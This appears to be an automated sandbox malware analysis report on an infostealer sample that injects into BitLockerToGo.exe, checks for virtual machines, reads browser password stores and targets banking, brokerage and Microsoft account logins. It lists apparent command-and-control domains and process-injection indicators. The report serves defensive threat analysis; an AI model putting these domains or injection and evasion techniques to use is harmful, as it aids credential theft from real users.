                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00438860
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00426000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00419362
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043FB80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043BCE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004384F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00440480
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00418DF1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040AD90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004095A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00408640
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040D6F8
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042BE8A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00429040
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00438040
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042A050
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00425850
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00432800
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00419820
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043F0CB
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004038D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004058E0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004308E0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004088F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040D0FF
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00415882
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040A8A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004390A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00409140
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0041D940
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00416148
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00406160
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00433960
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042F166
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00415966
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00424974
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00440130
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004229CD
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004111E9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043C1B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043F1B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00427A5A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0041D260
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00423A60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042C26C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042CA35
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042CAF1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043F2F6
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00404280
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042C282
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043EA80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00426340
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042CB4C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00426360
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0041AB00
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00437300
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00427B08
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00432B10
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043F330
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00404BC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004073C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043F3C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0041C3CC
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004393D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00423BE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040EB80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042238D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043F450
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00439C70
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042847D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00421C80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0041DC90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004274A5
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00427CB0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00436554
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00432D70
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040ED75
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043150E
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043C510
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0041D530
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00414DC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00437DE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004065F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042FDF9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00405DA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00436DB2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0041FE7C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043FE20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00402ED0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0040C6F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0041DE90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00418740
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00428F6C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00414777
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_004237D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00417FE1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0041EFE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00416F8D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0042F7BC
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 00407EE0 appears 45 times
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 00414110 appears 82 times
                Source: NjFiIQNSid.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/0@11/2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00438860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
                Source: NjFiIQNSid.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: BitLockerToGo.exe, 00000004.00000003.2775767646.000000000545B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2788727509.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2788449136.0000000005462000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775632875.0000000005477000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: NjFiIQNSid.exe | Virustotal: Detection: 45%
                Source: NjFiIQNSid.exe | ReversingLabs: Detection: 36%
                Source: NjFiIQNSid.exe | String found in binary or memory: net/addrselect.go
                Source: NjFiIQNSid.exe | String found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
                Source: unknown | Process created: C:\Users\user\Desktop\NjFiIQNSid.exe "C:\Users\user\Desktop\NjFiIQNSid.exe"
                Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Section loaded: powrprof.dll
                Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Section loaded: umpdc.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wldp.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winhttp.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: webio.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winnsi.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sspicli.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: schannel.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mskeyprotect.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntasn1.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncryptsslp.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: msasn1.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: gpapi.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dpapi.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: amsi.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: userenv.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: profapi.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: version.dll
                Source: NjFiIQNSid.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: NjFiIQNSid.exe | Static file information: File size 6870528 > 1048576
                Source: NjFiIQNSid.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2e8200
                Source: NjFiIQNSid.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x310400
                Source: NjFiIQNSid.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: NjFiIQNSid.exe | Static PE information: section name: .symtab
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043F000 push eax; mov dword ptr [esp], 5B5A5908h 4_2_0043F005
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00445408 push ebp; ret 4_2_00445409
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0044866F pushfd ; retf 4_2_00448677
                Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | System information queried: FirmwareTableInformation
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5992 | Thread sleep time: -210000s >= -30000s
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2787866105.00000000054F5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696508427p
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696508427s
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696508427f
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696508427t
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859405148.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2858201528.0000000003151000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857591004.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857591004.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859195015.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847665671.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                Source: NjFiIQNSid.exe, 00000000.00000002.2738368198.000000000124E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696508427o
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696508427j
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696508427x
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696508427t
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696508427
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information queried: ProcessInformation
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_0043D910 LdrInitializeThunk

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: bootstringjl.click
Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: A98008
Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 442000
Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000
Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 453000
Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4_2_00438040 cpuid 4_2_00438040
Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
